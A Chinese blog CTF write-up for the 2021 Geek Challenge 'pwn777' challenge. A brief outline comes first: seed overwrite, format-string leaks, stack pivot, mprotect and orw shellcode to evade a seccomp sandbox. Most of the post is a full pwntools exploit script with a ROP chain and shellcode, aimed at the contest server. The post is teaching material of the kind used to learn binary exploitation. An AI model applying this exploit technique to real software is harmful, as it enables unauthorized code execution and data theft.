2021极客大挑战 - pwn777 (WriteUp)

成都信息工程大学的新生赛,有点失望,pwn的题目水到爆炸,就一题pwn777有点意思。

附件下载:https://pan.baidu.com/s/1mEDAOE3Pz-x0oH4-eTcR-Q 提取码: 3pte

大体思路:
栈溢出改随机种子,然后伪随机数绕过。再格式化字符串泄露一波地址。
因为开了sandbox,禁用了execve,那么one_gadgetsystem这些也都不能用,所以考虑利用mprotect修改权限,再直接打orwshellcodeflag
注意到有bss段上的格式化字符串漏洞,通过在栈上找链利用,最终将需要修改的地址弄到栈上,按此方式修改rbpret,进行栈迁移,迁移到bss段,执行shellcode即可。

参考exp如下:

from pwn import *

context(os = "linux", arch = "amd64", log_level = "debug")
io = remote("47.242.20.238", 7777)

nums = [1804289383, 846930886, 1681692777, 1714636915, 1957747793, 424238335, 719885386, 1649760492, 596516649, 1189641421]
libc = ELF("./libc-2.23.so")
elf = ELF('./pwn')

io.recvuntil("name\n")
payload = b'a'*24 + p32(0)
io.send(payload)

for i in range(10):
	io.recvuntil("number:")
	io.sendline(str(nums[i]).encode())

io.recvuntil("best!\n")
io.sendline(b'%13$p%6$p%11$p')
libc_addr = int(io.recv(14)[2:14], 16)
base1 = libc_addr - 240 - libc.sym["__libc_start_main"]
log.info('LIBC:\t' + hex(base1))
mprotect_addr = base1 + libc.sym["mprotect"]
log.info('mprotect_addr:\t' + hex(mprotect_addr))
addr = int(io.recv(14)[10:14], 16)
main_addr = int(io.recv(14)[2:14], 16) 
base2 = main_addr - 0x16a8
log.info('PIE:\t' + hex(base2))
log.info('BSS:\t' + hex(elf.bss()))
bss_addr = base2 + 0x4060 + 16 - 8
leave_addr = base2 + 0x1676
log.info('bss_addr:\t' + hex(bss_addr))
log.info('leave_addr:\t' + hex(leave_addr))

val = addr + 8
payload = flat("%" + str(val) + "c%6$hn")
io.sendline(payload)
payload = flat("%" + str((leave_addr & 0xFF)) + "c%10$hhn")
io.sendline(payload)

val = addr
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str(bss_addr & 0xFFFF) + "c%41$hn")
io.sendline(payload)

val = addr + 2
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str((bss_addr >> 16) & 0xFFFF) + "c%41$hn")
io.sendline(payload)

val = addr + 4
payload = flat("%" + str(val) + "c%15$hn")
io.sendline(payload)
payload = flat("%" + str((bss_addr >> 32) & 0xFFFF) + "c%41$hn")
io.sendline(payload)

shellcode='''
    xor rax, rax
    xor rdi, rdi
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2
    mov rdi, 0x67616c662f2e
    push rdi
    mov rdi, rsp
    syscall

    mov rdx, 0x100
    mov rsi, rdi
    mov rdi, rax
    mov rax, 0
    syscall

    mov rdi, 1
    mov rax, 1
    syscall
'''

pop_rdi_ret = base1 + 0x21112
pop_rsi_ret = base1 + 0x202f8
pop_rdx_ret = base1 + 0x1b92
payload = b'jiaraniloveyou~\x00'
payload += p64(pop_rdi_ret)
payload += p64(bss_addr & 0xFFFFFFFFFFFFF000)
payload += p64(pop_rsi_ret)
payload += p64(0x1000)
payload += p64(pop_rdx_ret)
payload += p64(7)
payload += p64(mprotect_addr)
payload += p64(bss_addr + len(payload))
payload += asm(shellcode)

io.sendline(payload)
io.interactive()
posted @ 2021-11-15 00:21  winmt  阅读(495)  评论(5编辑  收藏  举报